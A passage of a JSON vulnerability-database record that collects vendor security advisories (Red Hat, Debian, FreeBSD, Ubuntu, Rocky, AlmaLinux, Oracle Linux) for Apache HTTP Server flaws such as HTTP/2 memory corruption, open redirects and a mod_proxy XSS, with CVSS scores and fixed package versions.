"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-06T19:02:18", "type": "redhat", "title": "(RHSA-2020:1336) Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1563", "CVE-2020-1927"], "modified": "2020-04-22T13:57:19", "id": "RHSA-2020:1336", "href": "https://access.redhat.com/errata/RHSA-2020:1336", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-08-04T12:27:58", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nThe following packages have been upgraded to a later upstream version: mod_http2 (1.15.7). (BZ#1814236)\n\nSecurity Fix(es):\n\n* httpd: memory corruption on early pushes (CVE-2019-10081)\n\n* httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n* httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n* httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n* httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n* httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n* httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-11-03T12:33:02", "type": "redhat", "title": "(RHSA-2020:4751) Moderate: httpd:2.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2020-11-04T00:04:21", "id": "RHSA-2020:4751", "href": "https://access.redhat.com/errata/RHSA-2020:4751", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "debian": [{"lastseen": "2023-06-26T15:03:27", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4509-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 26, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2019-9517 CVE-2019-10081 CVE-2019-10082 CVE-2019-10092\n CVE-2019-10097 CVE-2019-10098\n\nSeveral vulnerabilities have been found in the Apache HTTPD server.\n\nCVE-2019-9517\n\n Jonathan Looney reported that a malicious client could perform a\n denial of service attack (exhausting h2 workers) by flooding a\n connection with requests and basically never reading responses on\n the TCP connection.\n\nCVE-2019-10081\n\n Craig Young reported that HTTP/2 PUSHes could lead to an overwrite\n of memory in the pushing request&#x27;s pool, leading to crashes.\n\nCVE-2019-10082\n\n Craig Young reported that the HTTP/2 session handling could be made\n to read memory after being freed, during connection shutdown.\n\nCVE-2019-10092\n\n Matei &quot;Mal&quot; Badanoiu reported a limited cross-site scripting\n vulnerability in the mod_proxy error page.\n\nCVE-2019-10097\n\n Daniel McCarney reported that when mod_remoteip was configured to\n use a trusted intermediary proxy server using the &quot;PROXY&quot; protocol,\n a specially crafted PROXY header could trigger a stack buffer\n overflow or NULL pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP clients. The\n issue does not affect the stretch release.\n\nCVE-2019-10098\n\n Yukitsugu Sasaki reported a potential open redirect vulnerability in\n the mod_rewrite module.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFor the detailed security status of apache2 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/apache2\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-26T19:52:07", "type": "debian", "title": "[SECURITY] [DSA 4509-1] apache2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-08-26T19:52:07", "id": "DEBIAN:DSA-4509-1:D6C70", "href": "https://lists.debian.org/debian-security-announce/2019/msg00157.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T18:36:22", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4509-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 26, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2019-9517 CVE-2019-10081 CVE-2019-10082 CVE-2019-10092\n CVE-2019-10097 CVE-2019-10098\n\nSeveral vulnerabilities have been found in the Apache HTTPD server.\n\nCVE-2019-9517\n\n Jonathan Looney reported that a malicious client could perform a\n denial of service attack (exhausting h2 workers) by flooding a\n connection with requests and basically never reading responses on\n the TCP connection.\n\nCVE-2019-10081\n\n Craig Young reported that HTTP/2 PUSHes could lead to an overwrite\n of memory in the pushing request&#x27;s pool, leading to crashes.\n\nCVE-2019-10082\n\n Craig Young reported that the HTTP/2 session handling could be made\n to read memory after being freed, during connection shutdown.\n\nCVE-2019-10092\n\n Matei &quot;Mal&quot; Badanoiu reported a limited cross-site scripting\n vulnerability in the mod_proxy error page.\n\nCVE-2019-10097\n\n Daniel McCarney reported that when mod_remoteip was configured to\n use a trusted intermediary proxy server using the &quot;PROXY&quot; protocol,\n a specially crafted PROXY header could trigger a stack buffer\n overflow or NULL pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP clients. The\n issue does not affect the stretch release.\n\nCVE-2019-10098\n\n Yukitsugu Sasaki reported a potential open redirect vulnerability in\n the mod_rewrite module.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFor the detailed security status of apache2 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/apache2\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2019-08-26T19:52:07", "type": "debian", "title": "[SECURITY] [DSA 4509-1] apache2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-08-26T19:52:07", "id": "DEBIAN:DSA-4509-1:7B58D", "href": "https://lists.debian.org/debian-security-announce/2019/msg00157.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2023-06-13T16:08:16", "description": "\n\nSO-AND-SO reports:\n\nSECURITY: CVE-2019-10081\nmod_http2: HTTP/2 very early pushes, for example configured with \"H2PushResource\",\n\t could lead to an overwrite of memory in the pushing request's pool,\n\t leading to crashes. The memory copied is that of the configured push\n\t link header values, not data supplied by the client.\nSECURITY: CVE-2019-9517\nmod_http2: a malicious client could perform a DoS attack by flooding\n\t a connection with requests and basically never reading responses\n\t on the TCP connection. Depending on h2 worker dimensioning, it was\n\t possible to block those with relatively few connections.\nSECURITY: CVE-2019-10098\nrewrite, core: Set PCRE_DOTALL flag by default to avoid unpredictable\n\t matches and substitutions with encoded line break characters.\nSECURITY: CVE-2019-10092\nRemove HTML-escaped URLs from canned error responses to prevent misleading\n\t text/links being displayed via crafted links.\nSECURITY: CVE-2019-10097\nmod_remoteip: Fix stack buffer overflow and NULL pointer deference\n\t when reading the PROXY protocol header.\nCVE-2019-10082\nmod_http2: Using fuzzed network input, the http/2 session\n\t handling could be made to read memory after being freed,\n\t during connection shutdown.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-14T00:00:00", "type": "freebsd", "title": "Apache -- Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-08-14T00:00:00", "id": "CAF545F2-C0D9-11E9-9051-4C72B94353B5", "href": "https://vuxml.freebsd.org/freebsd/caf545f2-c0d9-11e9-9051-4c72b94353b5.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2023-07-16T17:43:13", "description": "## Releases\n\n * Ubuntu 19.04 \n * Ubuntu 18.04 ESM\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * apache2 \\- Apache HTTP server\n\nUSN-4113-1 fixed vulnerabilities in the Apache HTTP server. \nUnfortunately, that update introduced a regression when proxying \nbalancer manager connections in some configurations. This update \nfixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nStefan Eissing discovered that the HTTP/2 implementation in Apache \ndid not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in \nsome situations. A remote attacker could use this to cause a denial \nof service (daemon crash). This issue only affected Ubuntu 18.04 LTS \nand Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in \nApache when performing HTTP/2 very early pushes in some situations. A \nremote attacker could use this to cause a denial of service (daemon \ncrash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. \n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the \nHTTP/2 implementation in Apache during connection shutdown. A remote \nattacker could use this to possibly cause a denial of service (daemon \ncrash) or possibly expose sensitive information. This issue only \naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of \nApache did not properly filter URLs when reporting errors in some \nconfigurations. A remote attacker could possibly use this issue to \nconduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache \ncontained a stack buffer overflow when parsing headers from a trusted \nintermediary proxy in some situations. A remote attacker controlling a \ntrusted proxy could use this to cause a denial of service or possibly \nexecute arbitrary code. This issue only affected Ubuntu 19.04. \n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache \nwas vulnerable to open redirects in some situations. A remote attacker \ncould use this to possibly expose sensitive information or bypass \nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did \nnot properly limit the amount of buffering for client connections in \nsome situations. A remote attacker could use this to cause a denial \nof service (unresponsive daemon). This issue only affected Ubuntu \n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-09-17T00:00:00", "type": "ubuntu", "title": "Apache HTTP Server regression", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-09-17T00:00:00", "id": "USN-4113-2", "href": "https://ubuntu.com/security/notices/USN-4113-2", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-07-25T00:13:48", "description": "## Releases\n\n * Ubuntu 19.04 \n * Ubuntu 18.04 ESM\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * apache2 \\- Apache HTTP server\n\nStefan Eissing discovered that the HTTP/2 implementation in Apache \ndid not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in \nsome situations. A remote attacker could use this to cause a denial \nof service (daemon crash). This issue only affected Ubuntu 18.04 LTS \nand Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in \nApache when performing HTTP/2 very early pushes in some situations. A \nremote attacker could use this to cause a denial of service (daemon \ncrash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. \n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the \nHTTP/2 implementation in Apache during connection shutdown. A remote \nattacker could use this to possibly cause a denial of service (daemon \ncrash) or possibly expose sensitive information. This issue only \naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of \nApache did not properly filter URLs when reporting errors in some \nconfigurations. A remote attacker could possibly use this issue to \nconduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache \ncontained a stack buffer overflow when parsing headers from a trusted \nintermediary proxy in some situations. A remote attacker controlling a \ntrusted proxy could use this to cause a denial of service or possibly \nexecute arbitrary code. This issue only affected Ubuntu 19.04. \n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache \nwas vulnerable to open redirects in some situations. A remote attacker \ncould use this to possibly expose sensitive information or bypass \nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did \nnot properly limit the amount of buffering for client connections in \nsome situations. A remote attacker could use this to cause a denial \nof service (unresponsive daemon). This issue only affected Ubuntu \n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-29T00:00:00", "type": "ubuntu", "title": "Apache HTTP Server vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-08-29T00:00:00", "id": "USN-4113-1", "href": "https://ubuntu.com/security/notices/USN-4113-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "rocky": [{"lastseen": "2023-07-26T20:36:06", "description": "An update is available for mod_md.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nThe following packages have been upgraded to a later upstream version: mod_http2 (1.15.7). (BZ#1814236)\n\nSecurity Fix(es):\n\n* httpd: memory corruption on early pushes (CVE-2019-10081)\n\n* httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n* httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n* httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n* httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n* httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n* httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Rocky Linux 8.3 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-11-03T12:33:02", "type": "rocky", "title": "httpd:2.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2020-11-03T12:33:02", "id": "RLSA-2020:4751", "href": "https://errata.rockylinux.org/RLSA-2020:4751", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "almalinux": [{"lastseen": "2023-09-27T21:01:03", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nThe following packages have been upgraded to a later upstream version: mod_http2 (1.15.7). (BZ#1814236)\n\nSecurity Fix(es):\n\n* httpd: memory corruption on early pushes (CVE-2019-10081)\n\n* httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\n* httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n* httpd: mod_http2: read-after-free on a string compare (CVE-2019-0196)\n\n* httpd: mod_http2: possible crash on late upgrade (CVE-2019-0197)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n* httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n* httpd: mod_proxy_ftp use of uninitialized value (CVE-2020-1934)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-11-03T12:33:02", "type": "almalinux", "title": "Moderate: httpd:2.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2022-01-26T07:27:23", "id": "ALSA-2020:4751", "href": "https://errata.almalinux.org/8/ALSA-2020-4751.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:24:24", "description": "httpd\n[2.4.37-13.0.1]\n- Set vstring per ORACLE_SUPPORT_PRODUCT [Orabug: 29892262]\n- Replace index.html with Oracles index page oracle_index.html\n[2.4.37-30]\n- Resolves: #1209162 - support logging to journald from CustomLog\n[2.4.37-29]\n- Resolves: #1823263 (CVE-2020-1934) - CVE-2020-1934 httpd: mod_proxy_ftp use of\n uninitialized value\n[2.4.37-28]\n- Related: #1771847 - BalancerMember ping parameter for mod_proxy_http\n doesnt work\n[2.4.37-27]\n- Resolves: #1823259 - CVE-2020-1927 httpd:2.4/httpd: mod_rewrite configurations\n vulnerable to open redirect\n- Resolves: #1747284 - CVE-2019-10098 httpd:2.4/httpd: mod_rewrite potential\n open redirect\n- Resolves: #1747281 - CVE-2019-10092 httpd:2.4/httpd: limited cross-site\n scripting in mod_proxy error page\n- Resolves: #1747291 - CVE-2019-10097 httpd:2.4/httpd: null-pointer dereference\n in mod_remoteip\n- Resolves: #1771847 - BalancerMember ping parameter for mod_proxy_http\n doesnt work\n- Resolves: #1794728 - Backport of SessionExpiryUpdateInterval directive\nmod_http2\n[1.15.7-2]\n- Resolves: #1869073 - CVE-2020-9490 httpd:2.4/mod_http2: httpd:\n Push diary crash on specifically crafted HTTP/2 header\n[1.15.7-1]\n- new version 1.15.7\n- Resolves: #1814236 - RFE: mod_http2 rebase\n- Resolves: #1747289 - CVE-2019-10082 httpd:2.4/mod_http2: httpd:\n read-after-free in h2 connection shutdown\n- Resolves: #1696099 - CVE-2019-0197 httpd:2.4/mod_http2: httpd:\n mod_http2: possible crash on late upgrade\n- Resolves: #1696094 - CVE-2019-0196 httpd:2.4/mod_http2: httpd:\n mod_http2: read-after-free on a string compare\n- Resolves: #1677591 - CVE-2018-17189 httpd:2.4/mod_http2: httpd:\n mod_http2: DoS via slow, unneeded request bodies\nmod_md\n[1:2.0.8-8]\n- Resolves: #1832844 - mod_md does not work with ACME server that does not\n provide keyChange or revokeCert resources", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-11-10T00:00:00", "type": "oraclelinux", "title": "httpd:2.4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", 